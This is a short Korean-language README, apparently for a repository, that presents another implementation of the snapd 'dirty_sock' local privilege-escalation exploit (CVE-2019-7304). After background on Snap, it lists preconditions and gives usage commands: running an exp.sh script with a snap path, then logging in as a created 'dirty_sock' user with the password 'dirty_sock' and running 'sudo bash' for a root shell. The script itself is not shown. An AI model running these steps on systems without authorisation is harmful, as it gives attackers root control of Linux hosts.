
snap(d)(CVE-2019-7304)를 통한 리눅스 권한 상승 익스플로잇의 또 다른 구현
snap(d) (CVE-2019-7304)을 통한 Linux 권한 상승 익스플로잇의 또 다른 구현입니다.
Snap은 Linux 커널을 사용하는 운영 체제를 위해 Canonical이 개발한 소프트웨어 패키징 및 배포 시스템입니다. _snaps_라고 하는 패키지와 이를 사용하기 위한 도구인 _snapd_는 다양한 Linux 배포판에서 작동하며 업스트림 소프트웨어 개발자가 자신의 애플리케이션을 사용자에게 직접 배포할 수 있게 해줍니다. Snaps는 호스트 시스템에 대한 중재된 접근 권한을 가진 샌드박스에서 실행되는 자체 포함 애플리케이션입니다. Snap은 원래 클라우드 애플리케이션용으로 출시되었지만[1], 이후 사물 인터넷 기기[3][4] 및 데스크톱[5][6] 애플리케이션에서도 작동하도록 포팅되었습니다.
dirty_sock: snapd를 통한 Linux 권한 상승
- 시스템에 snap이 설치되어 있어야 합니다.
- snap에 대해 비밀번호가 있든 없든 sudo 권한이 있어야 합니다.
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
그런 다음 다음을 사용할 수 있습니다.
su - dirty_sock
dirty_sock (as password)
sudo bash